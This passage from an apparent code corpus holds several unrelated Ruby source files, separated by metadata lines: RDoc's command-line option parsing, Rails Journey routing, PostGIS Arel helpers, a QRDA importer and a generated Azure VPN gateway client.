"#{value} is an invalid tab width" if value <= 0 @tab_width = value end opt.separator nil opt.on("--visibility=VISIBILITY", "-V", RDoc::VISIBILITIES + [:nodoc], "Minimum visibility to document a method.", "One of 'public', 'protected' (the default),", "'private' or 'nodoc' (show everything)") do |value| @visibility = value end opt.separator nil markup_formats = RDoc::Text::MARKUP_FORMAT.keys.sort opt.on("--markup=MARKUP", markup_formats, "The markup format for the named files.", "The default is rdoc. Valid values are:", markup_formats.join(', ')) do |value| @markup = value end opt.separator nil opt.on("--root=ROOT", Directory, "Root of the source tree documentation", "will be generated for. Set this when", "building documentation outside the", "source directory. Default is the", "current directory.") do |root| @root = Pathname(root) end opt.separator nil opt.on("--page-dir=DIR", Directory, "Directory where guides, your FAQ or", "other pages not associated with a class", "live. Set this when you don't store", "such files at your project root.", "NOTE: Do not use the same file name in", "the page dir and the root of your project") do |page_dir| @page_dir = Pathname(page_dir) end opt.separator nil opt.separator "Common generator options:" opt.separator nil opt.on("--force-output", "-O", "Forces rdoc to write the output files,", "even if the output directory exists", "and does not seem to have been created", "by rdoc.") do |value| @force_output = value end opt.separator nil generator_text = @generators.keys.map { |name| " #{name}" }.sort opt.on("-f", "--fmt=FORMAT", "--format=FORMAT", @generators.keys, "Set the output formatter. 
One of:", *generator_text) do |value| check_generator @generator_name = value.downcase setup_generator end opt.separator nil opt.on("--include=DIRECTORIES", "-i", PathArray, "Set (or add to) the list of directories to", "be searched when satisfying :include:", "requests. Can be used more than once.") do |value| @rdoc_include.concat value.map { |dir| dir.strip } end opt.separator nil opt.on("--[no-]coverage-report=[LEVEL]", "--[no-]dcov", "-C", Integer, "Prints a report on undocumented items.", "Does not generate files.") do |value| value = 0 if value.nil? # Integer converts -C to nil @coverage_report = value @force_update = true if value end opt.separator nil opt.on("--output=DIR", "--op", "-o", "Set the output directory.") do |value| @op_dir = value end opt.separator nil opt.on("-d", "Deprecated --diagram option.", "Prevents firing debug mode", "with legacy invocation.") do |value| end opt.separator nil opt.separator 'HTML generator options:' opt.separator nil opt.on("--charset=CHARSET", "-c", "Specifies the output HTML character-set.", "Use --encoding instead of --charset if", "available.") do |value| @charset = value end opt.separator nil opt.on("--hyperlink-all", "-A", "Generate hyperlinks for all words that", "correspond to known methods, even if they", "do not start with '#' or '::' (legacy", "behavior).") do |value| @hyperlink_all = value end opt.separator nil opt.on("--main=NAME", "-m", "NAME will be the initial page displayed.") do |value| @main_page = value end opt.separator nil opt.on("--[no-]line-numbers", "-N", "Include line numbers in the source code.", "By default, only the number of the first", "line is displayed, in a leading comment.") do |value| @line_numbers = value end opt.separator nil opt.on("--show-hash", "-H", "A name of the form #name in a comment is a", "possible hyperlink to an instance method", "name. When displayed, the '#' is removed", "unless this option is specified.") do |value| @show_hash = value end opt.separator nil opt.on("--template=NAME", "-T", Template, "Set the template used when generating", "output. The default depends on the", "formatter used.") do |(template, template_dir)| @template = template @template_dir = template_dir end opt.separator nil opt.on("--template-stylesheets=FILES", PathArray, "Set (or add to) the list of files to", "include with the html template.") do |value| @template_stylesheets.concat value end opt.separator nil opt.on("--title=TITLE", "-t", "Set TITLE as the title for HTML output.") do |value| @title = value end opt.separator nil opt.on("--copy-files=PATH", Path, "Specify a file or directory to copy static", "files from.", "If a file is given it will be copied into", "the output dir. If a directory is given the", "entire directory will be copied.", "You can use this multiple times") do |value| @static_path << value end opt.separator nil opt.on("--webcvs=URL", "-W", "Specify a URL for linking to a web frontend", "to CVS. If the URL contains a '\%s', the", "name of the current file will be", "substituted; if the URL doesn't contain a", "'\%s', the filename will be appended to it.") do |value| @webcvs = value end opt.separator nil opt.separator "ri generator options:" opt.separator nil opt.on("--ri", "-r", "Generate output for use by `ri`. 
The files", "are stored in the '.rdoc' directory under", "your home directory unless overridden by a", "subsequent --op parameter, so no special", "privileges are needed.") do |value| check_generator @generator_name = "ri" @op_dir ||= RDoc::RI::Paths::HOMEDIR setup_generator end opt.separator nil opt.on("--ri-site", "-R", "Generate output for use by `ri`. The files", "are stored in a site-wide directory,", "making them accessible to others, so", "special privileges are needed.") do |value| check_generator @generator_name = "ri" @op_dir = RDoc::RI::Paths.site_dir setup_generator end opt.separator nil opt.separator "Generic options:" opt.separator nil opt.on("--write-options", "Write .rdoc_options to the current", "directory with the given options. Not all", "options will be used. See RDoc::Options", "for details.") do |value| @write_options = true end opt.separator nil opt.on("--[no-]dry-run", "Don't write any files") do |value| @dry_run = value end opt.separator nil opt.on("-D", "--[no-]debug", "Displays lots on internal stuff.") do |value| $DEBUG_RDOC = value end opt.separator nil opt.on("--[no-]ignore-invalid", "Ignore invalid options and continue", "(default true).") do |value| ignore_invalid = value end opt.separator nil opt.on("--quiet", "-q", "Don't show progress as we parse.") do |value| @verbosity = 0 end opt.separator nil opt.on("--verbose", "-V", "Display extra progress as RDoc parses") do |value| @verbosity = 2 end opt.separator nil opt.on("--version", "-v", "print the version") do puts opt.version exit end opt.separator nil opt.on("--help", "-h", "Display this help") do RDoc::RDoc::GENERATORS.each_key do |generator| setup_generator generator end puts opt.help exit end opt.separator nil end setup_generator 'darkfish' if argv.grep(/\A(-f|--fmt|--format|-r|-R|--ri|--ri-site)\b/).empty? deprecated = [] invalid = [] begin opts.parse! argv rescue OptionParser::ParseError => e if DEPRECATED[e.args.first] then deprecated << e.args.first elsif %w[--format --ri -r --ri-site -R].include? e.args.first then raise else invalid << e.args.join(' ') end retry end unless @generator then @generator = RDoc::Generator::Darkfish @generator_name = 'darkfish' end if @pipe and not argv.empty? then @pipe = false invalid << '-p (with files)' end unless quiet then deprecated.each do |opt| $stderr.puts 'option ' + opt + ' is deprecated: ' + DEPRECATED[opt] end end unless invalid.empty? then invalid = "invalid options: #{invalid.join ', '}" if ignore_invalid then unless quiet then $stderr.puts invalid $stderr.puts '(invalid options are ignored)' end else unless quiet then $stderr.puts opts end $stderr.puts invalid exit 1 end end @files = argv.dup finish if @write_options then write_options exit end self end ## # Don't display progress as we process the files def quiet @verbosity.zero? end ## # Set quietness to +bool+ def quiet= bool @verbosity = bool ? 0 : 1 end ## # Removes directories from +path+ that are outside the current directory def sanitize_path path require 'pathname' dot = Pathname.new('.').expand_path path.reject do |item| path = Pathname.new(item).expand_path is_reject = nil relative = nil begin relative = path.relative_path_from(dot).to_s rescue ArgumentError # On Windows, sometimes crosses different drive letters. is_reject = true else is_reject = relative.start_with? '..' end is_reject end end ## # Set up an output generator for the named +generator_name+. # # If the found generator responds to :setup_options it will be called with # the options instance. 
This allows generators to add custom options or set # default options. def setup_generator generator_name = @generator_name @generator = @generators[generator_name] unless @generator then raise OptionParser::InvalidArgument, "Invalid output formatter #{generator_name}" end return if @generator_options.include? @generator @generator_name = generator_name @generator_options << @generator if @generator.respond_to? :setup_options then @option_parser ||= OptionParser.new @generator.setup_options self end end ## # Finds the template dir for +template+ def template_dir_for template template_path = File.join 'rdoc', 'generator', 'template', template $LOAD_PATH.map do |path| File.join File.expand_path(path), template_path end.find do |dir| File.directory? dir end end # Sets the minimum visibility of a documented method. # # Accepts +:public+, +:protected+, +:private+, +:nodoc+, or +:all+. # # When +:all+ is passed, visibility is set to +:private+, similarly to # RDOCOPT="--all", see #visibility for more information. def visibility= visibility case visibility when :all @visibility = :private else @visibility = visibility end end ## # Displays a warning using Kernel#warn if we're being verbose def warn message super message if @verbosity > 1 end ## # Writes the YAML file .rdoc_options to the current directory containing the # parsed options. def write_options RDoc.load_yaml File.open '.rdoc_options', 'w' do |io| io.set_encoding Encoding::UTF_8 YAML.dump self, io end end ## # Loads options from .rdoc_options if the file exists, otherwise creates a # new RDoc::Options instance. def self.load_options options_file = File.expand_path '.rdoc_options' return RDoc::Options.new unless File.exist? options_file RDoc.load_yaml begin options = YAML.safe_load File.read('.rdoc_options'), permitted_classes: [RDoc::Options, Symbol] rescue Psych::SyntaxError raise RDoc::Error, "#{options_file} is not a valid rdoc options file" end return RDoc::Options.new unless options # Allow empty file. raise RDoc::Error, "#{options_file} is not a valid rdoc options file" unless RDoc::Options === options or Hash === options if Hash === options # Override the default values with the contents of YAML file. options = RDoc::Options.new options end options end end
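# Illustrative sketch (not part of the dataset record above): the last two
# methods of RDoc::Options shown here -- #write_options and ::load_options --
# form a YAML round-trip through a `.rdoc_options` file in the current
# directory. Assuming rdoc is installed and the working directory is writable,
# the round-trip can be exercised roughly like this; only methods visible in
# the excerpt are used.
require 'rdoc'

opts = RDoc::Options.new
opts.write_options            # serializes the instance to ./.rdoc_options via #encode_with

RDoc::Options.load_options    # safe-loads the file back; returns a fresh instance if the file is absent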
25.923194
101
0.60961
4aee7a6f83b201aa438abcd3e6109e6efe3a9992
5,105
# frozen_string_literal: true module ActionDispatch # :stopdoc: module Journey class Route attr_reader :app, :path, :defaults, :name, :precedence, :constraints, :internal, :scope_options alias :conditions :constraints module VerbMatchers VERBS = %w{ DELETE GET HEAD OPTIONS LINK PATCH POST PUT TRACE UNLINK } VERBS.each do |v| class_eval <<-eoc, __FILE__, __LINE__ + 1 class #{v} def self.verb; name.split("::").last; end def self.call(req); req.#{v.downcase}?; end end eoc end class Unknown attr_reader :verb def initialize(verb) @verb = verb end def call(request); @verb === request.request_method; end end class All def self.call(_); true; end def self.verb; ""; end end VERB_TO_CLASS = VERBS.each_with_object(all: All) do |verb, hash| klass = const_get verb hash[verb] = klass hash[verb.downcase] = klass hash[verb.downcase.to_sym] = klass end end def self.verb_matcher(verb) VerbMatchers::VERB_TO_CLASS.fetch(verb) do VerbMatchers::Unknown.new verb.to_s.dasherize.upcase end end ## # +path+ is a path constraint. # +constraints+ is a hash of constraints to be applied to this route. def initialize(name:, app: nil, path:, constraints: {}, required_defaults: [], defaults: {}, request_method_match: nil, precedence: 0, scope_options: {}, internal: false) @name = name @app = app @path = path @request_method_match = request_method_match @constraints = constraints @defaults = defaults @required_defaults = nil @_required_defaults = required_defaults @required_parts = nil @parts = nil @decorated_ast = nil @precedence = precedence @path_formatter = @path.build_formatter @scope_options = scope_options @internal = internal end def eager_load! path.eager_load! ast parts required_defaults nil end def ast @decorated_ast ||= begin decorated_ast = path.ast decorated_ast.find_all(&:terminal?).each { |n| n.memo = self } decorated_ast end end # Needed for `rails routes`. Picks up succinctly defined requirements # for a route, for example route # # get 'photo/:id', :controller => 'photos', :action => 'show', # :id => /[A-Z]\d{5}/ # # will have {:controller=>"photos", :action=>"show", :id=>/[A-Z]\d{5}/} # as requirements. def requirements @defaults.merge(path.requirements).delete_if { |_, v| /.+?/ == v } end def segments path.names end def required_keys required_parts + required_defaults.keys end def score(supplied_keys) required_keys = path.required_names required_keys.each do |k| return -1 unless supplied_keys.include?(k) end score = 0 path.names.each do |k| score += 1 if supplied_keys.include?(k) end score + (required_defaults.length * 2) end def parts @parts ||= segments.map(&:to_sym) end alias :segment_keys :parts def format(path_options) @path_formatter.evaluate path_options end def required_parts @required_parts ||= path.required_names.map(&:to_sym) end def required_default?(key) @_required_defaults.include?(key) end def required_defaults @required_defaults ||= @defaults.dup.delete_if do |k, _| parts.include?(k) || !required_default?(k) end end def glob? !path.spec.grep(Nodes::Star).empty? end def dispatcher? @app.dispatcher? end def matches?(request) match_verb(request) && constraints.all? { |method, value| case value when Regexp, String value === request.send(method).to_s when Array value.include?(request.send(method)) when TrueClass request.send(method).present? when FalseClass request.send(method).blank? else value === request.send(method) end } end def ip constraints[:ip] || // end def requires_matching_verb? !@request_method_match.all? 
{ |x| x == VerbMatchers::All } end def verb verbs.join("|") end private def verbs @request_method_match.map(&:verb) end def match_verb(request) @request_method_match.any? { |m| m.call request } end end end # :startdoc: end
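# Illustrative sketch (not part of the dataset record above): Route.verb_matcher
# maps a verb given as a string or symbol to one of the generated VerbMatchers
# classes, falling back to VerbMatchers::Unknown for anything it does not know.
# This is Rails-internal (:stopdoc:) API, shown only to trace the code above;
# it assumes actionpack (and therefore ActiveSupport's String#dasherize) is loaded.
route_class = ActionDispatch::Journey::Route

route_class.verb_matcher(:get).verb      # => "GET"
route_class.verb_matcher("post").verb    # => "POST"
route_class.verb_matcher(:all).verb      # => ""   (All matches every request method)

unknown = route_class.verb_matcher(:purge)
unknown.class                            # => ActionDispatch::Journey::Route::VerbMatchers::Unknown
unknown.verb                             # => "PURGE"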
25.525
176
0.544368
abb5a683f07cffae133581106cf825f782d74737
1,698
module ArelHelpers
  def ah = ArelHelpers

  class << self
    def cast(val, type)
      Arel::Nodes::InfixOperation.new('::', val, Arel.sql(type))
    end

    def contains(a, b)
      Arel::Nodes::InfixOperation.new('@>', a, b)
    end

    def cover(a, b)
      Arel::Nodes::InfixOperation.new('&&', a, b)
    end

    def distance(*args)
      Arel::Nodes::NamedFunction.new('ST_Distance', args)
    end

    def geo_from_text(a)
      Arel::Nodes::NamedFunction.new('ST_GeographyFromText', [
        Arel::Nodes::Quoted.new(Geography.geo_factory.generate_wkt(a))
      ])
    end

    def mode(col)
      Arel.sql %'mode() WITHIN GROUP (ORDER BY "#{col.relation.name}"."#{col.name}")'
    end

    def st_centroid(*args)
      Arel::Nodes::NamedFunction.new('ST_Centroid', args)
    end

    def st_covers(*args)
      Arel::Nodes::NamedFunction.new('ST_Covers', args)
    end

    def st_end_point(*args)
      Arel::Nodes::NamedFunction.new('ST_EndPoint', args)
    end

    def st_extent(*args)
      Arel::Nodes::NamedFunction.new('ST_Extent', args)
    end

    def st_length(*args)
      Arel::Nodes::NamedFunction.new('ST_Length', args)
    end

    def st_make_line(*args)
      Arel::Nodes::NamedFunction.new('ST_MakeLine', args)
    end

    def st_start_point(*args)
      Arel::Nodes::NamedFunction.new('ST_StartPoint', args)
    end

    def st_union(*args)
      Arel::Nodes::NamedFunction.new('ST_Union', args)
    end

    def subtract(a, b)
      Arel::Nodes::Subtraction.new(a, b)
    end

    def tsrange(*args)
      Arel::Nodes::NamedFunction.new('tsrange', args)
    end

    def within(*args)
      Arel::Nodes::NamedFunction.new('ST_DWithin', args)
    end
  end
end
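# Illustrative sketch (not part of the dataset record above): the helpers wrap
# PostgreSQL/PostGIS operators in Arel nodes so they compose into ActiveRecord
# queries. `Place` and its `tags`/`route` columns are hypothetical names used
# only for this example; `include ArelHelpers` would additionally expose the
# `ah` shorthand for the module itself.
places = Place.arel_table

# rows whose tags array contains 'park' (PostgreSQL @> operator)
tagged = ArelHelpers.contains(places[:tags], Arel.sql("ARRAY['park']"))

# PostGIS ST_Length of each route geometry, usable as an ordering expression
length = ArelHelpers.st_length(places[:route])

Place.where(tagged).order(length).to_sql
# => SELECT "places".* FROM "places" WHERE "places"."tags" @> ARRAY['park'] ORDER BY ST_Length("places"."route")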
22.342105
85
0.62073
bf8741c36adbfd776de27ea41db6d93ffc541c24
885
module QRDA
  module Cat1
    class CommunicationFromProviderToProviderImporter < SectionImporter
      def initialize(entry_finder = QRDA::Cat1::EntryFinder.new("./cda:entry/cda:act[cda:templateId/@root = '2.16.840.1.113883.10.20.24.3.4']"))
        super(entry_finder)
        @entry_does_not_have_reason = true
        @id_xpath = './cda:id'
        @code_xpath = './cda:code'
        @author_datetime_xpath = "./cda:author/cda:time"
        @related_to_xpath = "./sdtc:inFulfillmentOf1/sdtc:actReference"
        @entry_class = QDM::CommunicationFromProviderToProvider
      end

      def create_entry(entry_element, nrh = NarrativeReferenceHandler.new)
        communication_from_provider_to_provider = super
        communication_from_provider_to_provider.relatedTo = extract_related_to(entry_element)
        communication_from_provider_to_provider
      end
    end
  end
end
40.227273
144
0.715254
91579575a3af055956c06f4e7c89e54106df631b
46,333
# Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. module Azure::Network::Mgmt::V2020_05_01 # # VpnGateways # class VpnGateways include MsRestAzure # # Creates and initializes a new instance of the VpnGateways class. # @param client service class for accessing basic functionality. # def initialize(client) @client = client end # @return [NetworkManagementClient] reference to the NetworkManagementClient attr_reader :client # # Retrieves the details of a virtual wan vpn gateway. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [VpnGateway] operation results. # def get(resource_group_name, gateway_name, custom_headers:nil) response = get_async(resource_group_name, gateway_name, custom_headers:custom_headers).value! response.body unless response.nil? end # # Retrieves the details of a virtual wan vpn gateway. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def get_with_http_info(resource_group_name, gateway_name, custom_headers:nil) get_async(resource_group_name, gateway_name, custom_headers:custom_headers).value! end # # Retrieves the details of a virtual wan vpn gateway. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def get_async(resource_group_name, gateway_name, custom_headers:nil) fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil? fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil? fail ArgumentError, 'gateway_name is nil' if gateway_name.nil? fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? 
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'gatewayName' => gateway_name}, query_params: {'api-version' => @client.api_version}, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:get, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 error_model = JSON.load(response_content) fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content) result_mapper = Azure::Network::Mgmt::V2020_05_01::Models::VpnGateway.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Creates a virtual wan vpn gateway if it doesn't exist else updates the # existing gateway. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param vpn_gateway_parameters [VpnGateway] Parameters supplied to create or # Update a virtual wan vpn gateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [VpnGateway] operation results. # def create_or_update(resource_group_name, gateway_name, vpn_gateway_parameters, custom_headers:nil) response = create_or_update_async(resource_group_name, gateway_name, vpn_gateway_parameters, custom_headers:custom_headers).value! response.body unless response.nil? end # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param vpn_gateway_parameters [VpnGateway] Parameters supplied to create or # Update a virtual wan vpn gateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [Concurrent::Promise] promise which provides async access to http # response. # def create_or_update_async(resource_group_name, gateway_name, vpn_gateway_parameters, custom_headers:nil) # Send request promise = begin_create_or_update_async(resource_group_name, gateway_name, vpn_gateway_parameters, custom_headers:custom_headers) promise = promise.then do |response| # Defining deserialization method. deserialize_method = lambda do |parsed_response| result_mapper = Azure::Network::Mgmt::V2020_05_01::Models::VpnGateway.mapper() parsed_response = @client.deserialize(result_mapper, parsed_response) end # Waiting for response. 
@client.get_long_running_operation_result(response, deserialize_method) end promise end # # Updates virtual wan vpn gateway tags. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param vpn_gateway_parameters [TagsObject] Parameters supplied to update a # virtual wan vpn gateway tags. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [VpnGateway] operation results. # def update_tags(resource_group_name, gateway_name, vpn_gateway_parameters, custom_headers:nil) response = update_tags_async(resource_group_name, gateway_name, vpn_gateway_parameters, custom_headers:custom_headers).value! response.body unless response.nil? end # # Updates virtual wan vpn gateway tags. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param vpn_gateway_parameters [TagsObject] Parameters supplied to update a # virtual wan vpn gateway tags. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def update_tags_with_http_info(resource_group_name, gateway_name, vpn_gateway_parameters, custom_headers:nil) update_tags_async(resource_group_name, gateway_name, vpn_gateway_parameters, custom_headers:custom_headers).value! end # # Updates virtual wan vpn gateway tags. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param vpn_gateway_parameters [TagsObject] Parameters supplied to update a # virtual wan vpn gateway tags. # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def update_tags_async(resource_group_name, gateway_name, vpn_gateway_parameters, custom_headers:nil) fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil? fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil? fail ArgumentError, 'gateway_name is nil' if gateway_name.nil? fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? fail ArgumentError, 'vpn_gateway_parameters is nil' if vpn_gateway_parameters.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? # Serialize Request request_mapper = Azure::Network::Mgmt::V2020_05_01::Models::TagsObject.mapper() request_content = @client.serialize(request_mapper, vpn_gateway_parameters) request_content = request_content != nil ? 
JSON.generate(request_content, quirks_mode: true) : nil path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'gatewayName' => gateway_name}, query_params: {'api-version' => @client.api_version}, body: request_content, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:patch, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 error_model = JSON.load(response_content) fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content) result_mapper = Azure::Network::Mgmt::V2020_05_01::Models::VpnGateway.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Deletes a virtual wan vpn gateway. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # def delete(resource_group_name, gateway_name, custom_headers:nil) response = delete_async(resource_group_name, gateway_name, custom_headers:custom_headers).value! nil end # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [Concurrent::Promise] promise which provides async access to http # response. # def delete_async(resource_group_name, gateway_name, custom_headers:nil) # Send request promise = begin_delete_async(resource_group_name, gateway_name, custom_headers:custom_headers) promise = promise.then do |response| # Defining deserialization method. deserialize_method = lambda do |parsed_response| end # Waiting for response. @client.get_long_running_operation_result(response, deserialize_method) end promise end # # Resets the primary of the vpn gateway in the specified resource group. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [VpnGateway] operation results. 
# def reset(resource_group_name, gateway_name, custom_headers:nil) response = reset_async(resource_group_name, gateway_name, custom_headers:custom_headers).value! response.body unless response.nil? end # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param gateway_name [String] The name of the gateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [Concurrent::Promise] promise which provides async access to http # response. # def reset_async(resource_group_name, gateway_name, custom_headers:nil) # Send request promise = begin_reset_async(resource_group_name, gateway_name, custom_headers:custom_headers) promise = promise.then do |response| # Defining deserialization method. deserialize_method = lambda do |parsed_response| result_mapper = Azure::Network::Mgmt::V2020_05_01::Models::VpnGateway.mapper() parsed_response = @client.deserialize(result_mapper, parsed_response) end # Waiting for response. @client.get_long_running_operation_result(response, deserialize_method, FinalStateVia::LOCATION) end promise end # # Lists all the VpnGateways in a resource group. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [Array<VpnGateway>] operation results. # def list_by_resource_group(resource_group_name, custom_headers:nil) first_page = list_by_resource_group_as_lazy(resource_group_name, custom_headers:custom_headers) first_page.get_all_items end # # Lists all the VpnGateways in a resource group. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def list_by_resource_group_with_http_info(resource_group_name, custom_headers:nil) list_by_resource_group_async(resource_group_name, custom_headers:custom_headers).value! end # # Lists all the VpnGateways in a resource group. # # @param resource_group_name [String] The resource group name of the # VpnGateway. # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def list_by_resource_group_async(resource_group_name, custom_headers:nil) fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil? fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil? fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? 
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name}, query_params: {'api-version' => @client.api_version}, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:get, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 error_model = JSON.load(response_content) fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content) result_mapper = Azure::Network::Mgmt::V2020_05_01::Models::ListVpnGatewaysResult.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Lists all the VpnGateways in a subscription. # # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [Array<VpnGateway>] operation results. # def list(custom_headers:nil) first_page = list_as_lazy(custom_headers:custom_headers) first_page.get_all_items end # # Lists all the VpnGateways in a subscription. # # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def list_with_http_info(custom_headers:nil) list_async(custom_headers:custom_headers).value! end # # Lists all the VpnGateways in a subscription. # # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def list_async(custom_headers:nil) fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil? fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? 
